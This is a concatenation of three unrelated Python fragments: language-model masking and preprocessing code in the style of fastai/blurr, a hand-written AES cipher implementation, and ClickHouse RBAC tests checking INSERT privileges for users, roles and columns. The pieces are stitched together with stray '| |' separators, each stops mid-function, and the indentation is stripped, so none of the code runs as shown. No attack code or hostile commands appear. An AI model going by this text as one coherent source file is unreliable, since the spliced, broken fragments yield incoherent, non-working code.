# drop the last chunk of text if it is smaller than chunk size (see the HF course, section 7 on training MLMs)
total_length = (n_total_toks // max_chunk_size) * max_chunk_size
# break our concatenated text into chunks of size max_chunk_size
examples = []
for i in range(0, total_length, max_chunk_size):
chunked_offsets = inputs["offset_mapping"][i : i + max_chunk_size]
chunked_text = concat_txts[self.text_attr][min(chunked_offsets)[0] : max(chunked_offsets)[1]]
examples.append(chunked_text)
return pd.DataFrame(examples, columns=[f"proc_{self.text_attr}"])
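# Usage sketch for the preprocessor above (model and column names are illustrative;
# assumes a Hugging Face tokenizer has already been loaded, e.g. via transformers.AutoTokenizer):
#   preproc = LMPreprocessor(hf_tokenizer, chunk_size=128, text_attr="text")
#   proc_df = preproc.process_df(train_df, valid_df)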
# Cell
class LMType(Enum):
"""Use this enum to indicate what kind of language model you are training"""
CAUSAL = 1
MASKED = 2
# Cell
class BaseLMStrategy(ABC):
"""ABC for various language modeling strategies (e.g., causal, BertMLM, WholeWordMLM, etc...)"""
def __init__(self, hf_tokenizer, ignore_token_id=CrossEntropyLossFlat().ignore_index):
store_attr(["hf_tokenizer", "ignore_token_id"])
@abstractmethod
def build_inputs_targets(self, samples, include_labels: bool = True, inputs: Optional[BatchEncoding] = None):
pass
# utility methods
def _get_random_token_id(self, n):
return random.sample(list(self.hf_tokenizer.get_vocab().values()), n)
@classmethod
@abstractmethod
def get_lm_type(cls):
pass
# Cell
class CausalLMStrategy(BaseLMStrategy):
"""For next token prediction language modeling tasks, we want to use the `CausalLMStrategy` which makes the
necessary changes in your inputs/targets for causal LMs
"""
def build_inputs_targets(self, samples, include_labels: bool = True, inputs: Optional[BatchEncoding] = None):
updated_samples = []
for s in samples:
if include_labels:
s[0]["labels"] = s[0]["input_ids"].clone()
s[0]["labels"][s[0]["labels"] == self.hf_tokenizer.pad_token_id] = self.ignore_token_id
targ_ids = torch.cat([s[0]["input_ids"][1:], tensor([self.hf_tokenizer.eos_token_id])])
updated_samples.append((s[0], targ_ids))
return updated_samples
@classmethod
def get_lm_type(cls) -> LMType:
return LMType.CAUSAL
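# Worked example of the shift above (token ids are illustrative): for
# input_ids = [10, 11, 12], targ_ids becomes [11, 12, eos_token_id], i.e. the
# inputs shifted left by one with EOS appended, so each position predicts the
# next token.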
# Cell
class BertMLMStrategy(BaseLMStrategy):
"""A masked language modeling strategy using the default BERT masking definition."""
def __init__(self, hf_tokenizer, ignore_token_id=CrossEntropyLossFlat().ignore_index):
super().__init__(hf_tokenizer, ignore_token_id)
vocab = hf_tokenizer.get_vocab()
self.dnm_tok_ids = [
vocab[tok] for tok in list(hf_tokenizer.special_tokens_map.values()) if vocab[tok] != hf_tokenizer.mask_token_id
]
def build_inputs_targets(self, samples, include_labels: bool = True, inputs: Optional[BatchEncoding] = None):
updated_samples = []
for s in samples:
# mask the input_ids
masked_input_ids = s[0]["input_ids"].clone()
# we want to mask 15% of the non-special tokens (special tokens include [CLS], [SEP], etc.)
idxs = torch.randperm(len(masked_input_ids))
total_masked_idxs = int(len(idxs) * 0.15)
# of the 15% for masking, replace 80% with [MASK] token, 10% with random token, and 10% with correct token
n_mask_idxs = int(total_masked_idxs * 0.8)
n_rnd_idxs = int(total_masked_idxs * 0.1)
# we only want non-special tokens
mask_idxs = [idx for idx in idxs if masked_input_ids[idx] not in self.dnm_tok_ids][:total_masked_idxs]
# replace 80% with [MASK]
if n_mask_idxs > 0 and len(mask_idxs) >= n_mask_idxs:
masked_input_ids[[mask_idxs[:n_mask_idxs]]] = self.hf_tokenizer.mask_token_id
# replace 10% with a random token
if n_rnd_idxs > 0 and len(mask_idxs) >= (n_mask_idxs + n_rnd_idxs):
rnd_tok_ids = self._get_random_token_id(n_rnd_idxs)
masked_input_ids[[mask_idxs[n_mask_idxs : (n_mask_idxs + n_rnd_idxs)]]] = tensor(rnd_tok_ids)
# ignore padding when calculating the loss
lbls = s[0]["input_ids"].clone()
lbls[[[idx for idx in idxs if idx not in mask_idxs]]] = self.ignore_token_id
# update the inputs to use our masked input_ids and labels; set targ_ids = labels (will use when
# we calculate the loss ourselves)
s[0]["input_ids"] = masked_input_ids
targ_ids = lbls
if include_labels:
s[0]["labels"] = targ_ids.clone()
updated_samples.append((s[0], targ_ids))
return updated_samples
@classmethod
def get_lm_type(cls) -> LMType:
return LMType.MASKED
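# Worked example of the masking split above (counts are illustrative): with 100
# tokens, total_masked_idxs = 15; of those selected (non-special) positions,
# n_mask_idxs = 12 (80%) are replaced with the [MASK] token id, n_rnd_idxs = 1
# (10%, int-truncated) gets a random token id, and the remainder keep their
# original id. In the labels, every position not selected for masking is set to
# ignore_token_id so it does not contribute to the loss.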
# Cell
class CausalLMTextInput(TextInput):
pass
# export
class MLMTextInput(TextInput):
pass
# Cell
class LMBatchTokenizeTransform(BatchTokenizeTransform):
def __init__(
self,
# The abbreviation/name of your Hugging Face transformer architecture (e.g., bert, bart, etc.)
hf_arch: str,
# A specific configuration instance you want to use
hf_config: PretrainedConfig,
# A Hugging Face tokenizer
hf_tokenizer: PreTrainedTokenizerBase,
# A Hugging Face model
hf_model: PreTrainedModel,
# To control whether the "labels" are included in your inputs. If they are, the loss will be calculated in
# the model's forward function and you can simply use `PreCalculatedLoss` as your `Learner`'s loss function to use it
include_labels: bool = True,
# The token ID that should be ignored when calculating the loss
ignore_token_id: int = CrossEntropyLossFlat().ignore_index,
# The language modeling strategy (or objective)
lm_strategy_cls: BaseLMStrategy = CausalLMStrategy,
# To control the length of the padding/truncation. It can be an integer or None,
# in which case it will default to the maximum length the model can accept. If the model has no
# specific maximum input length, truncation/padding to max_length is deactivated.
# See [Everything you always wanted to know about padding and truncation](https://huggingface.co/transformers/preprocessing.html#everything-you-always-wanted-to-know-about-padding-and-truncation)
max_length: int = None,
# To control the `padding` applied to your `hf_tokenizer` during tokenization. If None, will default to
# `False` or `'do_not_pad'`.
# See [Everything you always wanted to know about padding and truncation](https://huggingface.co/transformers/preprocessing.html#everything-you-always-wanted-to-know-about-padding-and-truncation)
padding: Union[bool, str] = True,
# To control `truncation` applied to your `hf_tokenizer` during tokenization. If None, will default to
# `False` or `do_not_truncate`.
# See [Everything you always wanted to know about padding and truncation](https://huggingface.co/transformers/preprocessing.html#everything-you-always-wanted-to-know-about-padding-and-truncation)
truncation: Union[bool, str] = True,
# The `is_split_into_words` argument applied to your `hf_tokenizer` during tokenization. Set this to `True`
# if your inputs are pre-tokenized (not numericalized)
is_split_into_words: bool = False,
# Any other keyword arguments you want included when using your `hf_tokenizer` to tokenize your inputs
tok_kwargs={},
# Any keyword arguments you want included when generating text
# See [How to generate text](https://huggingface.co/blog/how-to-generate)
text_gen_kwargs={},
# Keyword arguments to apply to `BatchTokenizeTransform`
**kwargs
):
super().__init__(
hf_arch,
hf_config,
hf_tokenizer,
hf_model,
include_labels=include_labels,
ignore_token_id=ignore_token_id,
max_length=max_length,
padding=padding,
truncation=truncation,
is_split_into_words=is_split_into_words,
tok_kwargs=tok_kwargs.copy(),
**kwargs
)
self.lm_strategy = lm_strategy_cls(hf_tokenizer=hf_tokenizer, ignore_token_id=ignore_token_id)
self.text_gen_kwargs, self.ignore_token_id = text_gen_kwargs, ignore_token_id
def encodes(self, samples, return_batch_encoding=False):
# because no target is specified in CLM, fastai will duplicate the inputs (which are just the raw text)
samples, inputs = super().encodes(samples, return_batch_encoding=True)
if len(samples[0]) == 1:
return samples
updated_samples = self.lm_strategy.build_inputs_targets(samples, self.include_labels, inputs)
if return_batch_encoding:
return updated_samples, inputs
return updated_samples
# Cell
@typedispatch
def show_batch(
# This typedispatched `show_batch` will be called for `CausalLMTextInput` typed inputs
x: CausalLMTextInput,
# Your targets
y,
# Your raw inputs/targets
samples,
# Your `DataLoaders`. This is required so as to get at the Hugging Face objects for
# decoding them into something understandable
dataloaders,
# Your `show_batch` context
ctxs=None,
# The maximum number of items to show
max_n=6,
# Any truncation your want applied to your decoded inputs
trunc_at=None,
# Any other keyword arguments you want applied to `show_batch`
**kwargs
):
# grab our tokenizer and ignore token to decode
tfm = first_blurr_tfm(dataloaders)
hf_tokenizer = tfm.hf_tokenizer
ignore_token_id = tfm.ignore_token_id
res | |
from typing import List, Union, Tuple, Any, Generator
from itertools import chain
import warnings
import os
ECB = 1
CBC = 2
S_box = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
Inv_S_box = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d],
]
Rcon = (
0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc,
0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4,
0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
)
def xtime(a): return (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)
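# xtime() is multiplication by x (i.e. by 2) in GF(2^8): shift left one bit and,
# if the high bit overflowed, reduce modulo the AES polynomial x^8+x^4+x^3+x+1
# (0x11B), which is what the conditional XOR with 0x1B achieves.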
def _split(a: List[bytes], n: int) -> List[List[bytes]]:
"""
Splits a list into n sub-lists of (as near as possible) equal size.
:param a: the list to split
:param n: number of parts to split the list into
:return: a list containing the parts of the source list
"""
k, m = divmod(len(a), n)
return list(a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))
def _chunk(l: List[Any], n: int) -> Generator:
"""
Chunks the provided list into sub-lists, each containing n items. Assumes that len(l) % n == 0
:param l: the list to chunk
:param n: number of elements in each chunk
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def _g(block: List[int], rc: bytes) -> List[bytes]:
"""
Performs the confusion step when expanding the key to roundkeys
:param block: the block to operate on
:param rc: the rcon value to use
:return: the transformed block
"""
block = [__sub_byte(b, S_box) for b in block[1:] + [block[0]]]
return [block[0] ^ rc] + block[1:]
def __sub_byte(b: int, box: List[List[bytes]]) -> bytes:
"""
Performs the substitution from one byte to another from the provided S-box
:param b: the byte to substitute
:param box: the box to pick substitution values from
:return: the substituted byte
"""
b = hex(b)[2:]
if len(b) == 1:
b = '0' + b
row, col = list(b)
return box[int(row, 16)][int(col, 16)]
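# Worked example for __sub_byte(): for b = 0x53 the hex string is "53", so row 5,
# column 3 of S_box is used, giving 0xed -- the standard AES SubBytes value for 0x53.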
def _sub_bytes(state, box):
new_mat = []
for row in state:
new_row = []
for v in row:
new_row.append(__sub_byte(v, box))
new_mat.append(new_row)
return new_mat
def _shift_rows(s: List[List[bytes]]) -> List[List[bytes]]:
"""
Performs the shift rows transformation as described in the standard
:param s: the state matrix
:return: the new state matrix with shifted rows
"""
s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]
return s
def _inv_shift_rows(s: List[List[bytes]]) -> List[List[bytes]]:
"""
Performs the inverted shift rows transformation as described in the standard
:param s: the state matrix
:return: the new state matrix with shifted rows
"""
s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]
s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]
return s
def _round(state: List[List[bytes]], round_key: List[Union[List[List[int]], List[list]]]) -> List[List[int]]:
"""
Performs a complete round over a block using the provided roundkey
:param state: the state matrix before the round transformations
:param round_key: the round key to use for this round
:return: state matrix after the round transformations have been applied
"""
state = _sub_bytes(state, S_box)
state = _shift_rows(state)
state = _mix_columns(state)
state = _add_round_key(state, round_key)
return state
def _inv_round(state: List[List[bytes]], round_key: List[Union[List[List[int]], List[list]]]) -> List[List[int]]:
"""
Performs a complete inverse round over a block using the provided roundkey
:param state: the state matrix before the inverse round transformations
:param round_key: the round key to use for this round
:return: state matrix after the inverse round transformations have been applied
"""
state = _inv_shift_rows(state)
state = _sub_bytes(state, Inv_S_box)
state = _add_round_key(state, round_key)
state = _inv_mix_columns(state)
return state
def __mix_column(col: List[bytes]) -> List[bytes]:
"""
Mixes a single column
:param col: The column to mix
:return: The mixed column
"""
t = col[0] ^ col[1] ^ col[2] ^ col[3]
u = col[0]
col[0] ^= t ^ xtime(col[0] ^ col[1])
col[1] ^= t ^ xtime(col[1] ^ col[2])
col[2] ^= t ^ xtime(col[2] ^ col[3])
col[3] ^= t ^ xtime(col[3] ^ u)
return col
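# The column mix above relies on the usual xtime identity: in GF(2^8),
# 2*a ^ 3*b = xtime(a ^ b) ^ b, so each output byte
# 2*a_i ^ 3*a_{i+1} ^ a_{i+2} ^ a_{i+3} can be computed as
# a_i ^ t ^ xtime(a_i ^ a_{i+1}), where t is the XOR of all four column bytes
# (u saves the original col[0] for the last line, since col[0] is mutated first).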
def _mix_columns(state: List[List[bytes]]) -> list:
"""
Performs the mix column transformation as described by the standard.
:param state: The current state
:return: The state with mixed columns
"""
return [__mix_column(column) for column in state]
def _inv_mix_columns(state: List[List[bytes]]) -> list:
"""
Performs the inverse mix column transformation as described by the standard.
:param state: The current state
:return: The state with mixed columns
"""
for s in state:
u = xtime(xtime(s[0] ^ s[2]))
v = xtime(xtime(s[1] ^ s[3]))
s[0] ^= u
s[1] ^= v
s[2] ^= u
s[3] ^= v
return _mix_columns(state)
def _add_round_key(state: List[List[bytes]], round_key: List[Union[List[List[int]], List[list]]]) -> list:
"""
Applies the current round key to the state matrix.
:param state: the current state matrix
:param round_key: the current round key
:return: the new state after the round key has been applied
"""
| |
from contextlib import contextmanager
import json
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
import rbac.tests.errors as errors
table_types = {
"MergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = MergeTree(d, (a, b), 111)",
"ReplacingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = ReplacingMergeTree(d, (a, b), 111)",
"SummingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = SummingMergeTree(d, (a, b), 111)",
"AggregatingMergeTree": "CREATE TABLE {name} (d DATE, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = AggregatingMergeTree(d, (a, b), 111)",
"CollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32) ENGINE = CollapsingMergeTree(d, (a, b), 111, y);",
"VersionedCollapsingMergeTree": "CREATE TABLE {name} (d Date, a String, b UInt8, x String, y Int8, z UInt32, version UInt64, sign Int8, INDEX a (b * y, d) TYPE minmax GRANULARITY 3) ENGINE = VersionedCollapsingMergeTree(sign, version) ORDER BY tuple()",
"GraphiteMergeTree": "CREATE TABLE {name} (key UInt32, Path String, Time DateTime, d Date, a String, b UInt8, x String, y Int8, z UInt32, Value Float64, Version UInt32, col UInt64, INDEX a (key * Value, Time) TYPE minmax GRANULARITY 3) ENGINE = GraphiteMergeTree('graphite_rollup_example') ORDER BY tuple()"
}
table_requirements = {
"MergeTree": RQ_SRS_006_RBAC_Privileges_Insert_MergeTree("1.0"),
"ReplacingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_ReplacingMergeTree("1.0"),
"SummingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_SummingMergeTree("1.0"),
"AggregatingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_AggregatingMergeTree("1.0"),
"CollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_CollapsingMergeTree("1.0"),
"VersionedCollapsingMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_VersionedCollapsingMergeTree("1.0"),
"GraphiteMergeTree": RQ_SRS_006_RBAC_Privileges_Insert_GraphiteMergeTree("1.0"),
}
@contextmanager
def table(node, name, table_type="MergeTree"):
try:
with Given(f"I have a {table_type} table"):
node.query(table_types[table_type].format(name=name))
yield
finally:
with Finally("I drop the table"):
node.query(f"DROP TABLE IF EXISTS {name}")
@contextmanager
def user(node, name):
try:
names = name.split(",")
for i in names:
with Given("I have a user"):
node.query(f"CREATE USER OR REPLACE {i}")
yield
finally:
for i in names:
with Finally("I drop the user"):
node.query(f"DROP USER IF EXISTS {name}")
@contextmanager
def role(node, role):
try:
roles = role.split(",")
for j in roles:
with Given("I have a role"):
node.query(f"CREATE ROLE OR REPLACE {j}")
yield
finally:
for j in roles:
with Finally("I drop the role"):
node.query(f"DROP ROLE IF EXISTS {role}")
def input_output_equality_check(node, input_columns, input_data):
data_list = [x.strip("'") for x in input_data.split(",")]
input_dict = dict(list(zip(input_columns.split(","), data_list)))
output_dict = json.loads(node.query(f"select {input_columns} from merge_tree format JSONEachRow").output)
output_dict = {k:str(v) for (k,v) in list(output_dict.items())}
return input_dict == output_dict
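# Example of the check above (values are illustrative): with input_columns="d,b"
# and input_data="'2020-01-01',9" the helper builds {"d": "2020-01-01", "b": "9"}
# and compares it, as strings, against the JSONEachRow output of
# "select d,b from merge_tree".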
@TestScenario
def without_privilege(self, table_type, node=None):
"""Check that user without insert privilege on a table is not able to insert on that table.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I run INSERT without privilege"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')", settings = [("user","user0")],
exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Grant("1.0"),
)
def user_with_privilege(self, table_type, node=None):
"""Check that user can insert into a table on which they have insert privilege and the inserted data is correct.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant privilege"):
node.query("GRANT INSERT ON merge_tree TO user0")
with And("I use INSERT"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')", settings=[("user","user0")])
with Then("I check the insert functioned"):
output = node.query("SELECT d FROM merge_tree FORMAT JSONEachRow").output
assert output == '{"d":"2020-01-01"}', error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Revoke("1.0"),
)
def user_with_revoked_privilege(self, table_type, node=None):
"""Check that user is unable to insert into a table after insert privilege on that table has been revoked from user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant privilege"):
node.query("GRANT INSERT ON merge_tree TO user0")
with And("I revoke privilege"):
node.query("REVOKE INSERT ON merge_tree FROM user0")
with And("I use INSERT"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
def user_with_privilege_on_columns(self, table_type):
Scenario(run=user_column_privileges,
examples=Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass table_type",
[tuple(list(row)+[table_type]) for row in user_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Column("1.0"),
)
@Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass", [
("d", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a,b", "d,a,b", "x", "d,b", '\'woo\'', '\'2020-01-01\',9'),
("d,a,b", "b", "y", "d,a,b", '9', '\'2020-01-01\',\'woo\',9')
])
def user_column_privileges(self, grant_columns, insert_columns_pass, data_fail, data_pass, table_type,
revoke_columns=None, insert_columns_fail=None, node=None):
"""Check that user is able to insert on granted columns
and unable to insert on not granted or revoked columns.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"):
with When("I grant insert privilege"):
node.query(f"GRANT INSERT({grant_columns}) ON merge_tree TO user0")
if insert_columns_fail is not None:
with And("I insert into not granted column"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_fail}) VALUES ({data_fail})",
settings=[("user","user0")], exitcode=exitcode, message=message)
with And("I insert into granted column"):
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")])
with Then("I check the insert functioned"):
input_equals_output = input_output_equality_check(node, insert_columns_pass, data_pass)
assert input_equals_output, error()
if revoke_columns is not None:
with When("I revoke insert privilege from columns"):
node.query(f"REVOKE INSERT({revoke_columns}) ON merge_tree FROM user0")
with And("I insert into revoked columns"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query(f"INSERT INTO merge_tree ({insert_columns_pass}) VALUES ({data_pass})",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Grant("1.0"),
)
def role_with_privilege(self, table_type, node=None):
"""Check that user can insert into a table after it is granted a role that
has the insert privilege for that table.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant insert privilege to a role"):
node.query("GRANT INSERT ON merge_tree TO role0")
with And("I grant role to the user"):
node.query("GRANT role0 TO user0")
with And("I insert into a table"):
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')", settings=[("user","user0")])
with Then("I check that I can read inserted data"):
output = node.query("SELECT d FROM merge_tree FORMAT JSONEachRow").output
assert output == '{"d":"2020-01-01"}', error()
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Revoke("1.0"),
)
def role_with_revoked_privilege(self, table_type, node=None):
"""Check that user with a role that has insert privilege on a table
is unable to insert into that table after insert privilege
has been revoked from the role.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege to a role"):
node.query("GRANT INSERT ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I revoke privilege from the role"):
node.query("REVOKE INSERT ON merge_tree FROM role0")
with And("I insert into the table"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
def user_with_revoked_role(self, table_type, node=None):
"""Check that user with a role that has insert privilege on a table
is unable to insert into that table after the role with insert
privilege has been revoked from the user.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant privilege to a role"):
node.query("GRANT INSERT ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
with And("I revoke the role from the user"):
node.query("REVOKE role0 FROM user0")
with And("I insert into the table"):
exitcode, message = errors.not_enough_privileges(name="user0")
node.query("INSERT INTO merge_tree (d) VALUES ('2020-01-01')",
settings=[("user","user0")], exitcode=exitcode, message=message)
@TestScenario
def role_with_privilege_on_columns(self, table_type):
Scenario(run=role_column_privileges,
examples=Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass table_type",
[tuple(list(row)+[table_type]) for row in role_column_privileges.examples]))
@TestOutline(Scenario)
@Requirements(
RQ_SRS_006_RBAC_Privileges_Insert_Column("1.0"),
)
@Examples("grant_columns revoke_columns insert_columns_fail insert_columns_pass data_fail data_pass", [
("d", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a", "d", "x", "d", '\'woo\'', '\'2020-01-01\''),
("d,a,b", "d,a,b", "x", "d,b", '\'woo\'', '\'2020-01-01\',9'),
("d,a,b", "b", "y", "d,a,b", '9', '\'2020-01-01\',\'woo\',9')
])
def role_column_privileges(self, grant_columns, insert_columns_pass, data_fail, data_pass,
table_type, revoke_columns=None, insert_columns_fail=None, node=None):
"""Check that user with a role is able to insert on granted columns and unable
to insert on not granted or revoked columns.
"""
if node is None:
node = self.context.node
with table(node, "merge_tree", table_type):
with user(node, "user0"), role(node, "role0"):
with When("I grant insert privilege"):
node.query(f"GRANT INSERT({grant_columns}) ON merge_tree TO role0")
with And("I grant the role to a user"):
node.query("GRANT role0 TO user0")
if insert_columns_fail is not None:
